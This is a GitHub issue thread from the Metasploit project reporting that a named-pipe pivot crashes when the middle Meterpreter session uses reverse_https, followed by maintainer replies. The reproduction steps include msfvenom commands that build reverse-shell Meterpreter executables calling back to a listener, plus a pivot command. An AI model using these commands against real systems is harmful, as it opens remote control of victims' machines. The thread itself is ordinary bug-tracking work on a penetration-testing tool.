### ISSUE TITLE
Named pipe pivot: crash if middle session is on REVERSE_HTTPS

### ISSUE THREAD

**Issue by manduc4** [rapid7/metasploit-framework#9903]
## Steps to reproduce

**middle session**
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.42.42 LPORT=8443 -f exe -o pwnme.exe

**outer session**
msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=win2008-victim1 PIPENAME=exchange64 -f exe -o pipeme_v1b_exchange64.exe

**pivot**
pivot add -t pipe -l 192.168.42.2 -n exchange64 -a x64 -p windows

then start the outer process.

## Expected behavior

Outer process should talk through middle process to MSF.
**Note: This works completely fine if middle process connects with REVERSE_TCP. It only crashes if middle process is on REVERSE_HTTPS**

## Current behavior

MSF sees a session for a moment, then it is gone.
```
meterpreter > [*] Meterpreter session 2 opened (Pivot via [192.168.42.42:8443 -> 192.168.42.2:52944]) at 2018-04-22 06:09:50 +0200
[*]  - Meterpreter session 2 closed.
```

middle process crashes:
```
0000000000158050 | 48 83 EC 38              | sub rsp,38                              |
0000000000158054 | 4C 89 4C 24 28           | mov qword ptr ss:[rsp+28],r9            |
0000000000158059 | 44 89 44 24 20           | mov dword ptr ss:[rsp+20],r8d           |
000000000015805E | 44 8B 41 28              | mov r8d,dword ptr ds:[rcx+28]           |  <============  RCX is 0
0000000000158062 | 44 8B CA                 | mov r9d,edx                             |
0000000000158065 | 48 8B 51 20              | mov rdx,qword ptr ds:[rcx+20]           |
0000000000158069 | E8 5A 07 00 00           | call 1587C8                             |
000000000015806E | 48 83 C4 38              | add rsp,38                              |
0000000000158072 | C3                       | ret                                     |
```

### Metasploit version
**Framework: 4.16.20-dev-
Console  : 4.16.20-dev-**
and also on
**Framework: 4.16.52-dev-
Console  : 4.16.52-dev-**

### I installed Metasploit with:
- [ ] Kali package via apt
- [x] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS
ubuntu 16.04

target machines are win2008 R2 x64

**Comment by OJ** [comment]
Thanks for the report @manduc4, I'll see if I can repro this in the lab and get back to you.

**Comment by OJ** [comment]
Sorry for the delay on this. I'm planning on looking at this at some point this week. Watch this space!

**Comment by OJ** [comment]
Sorry it took so long, turned out to be an easy fix. :)
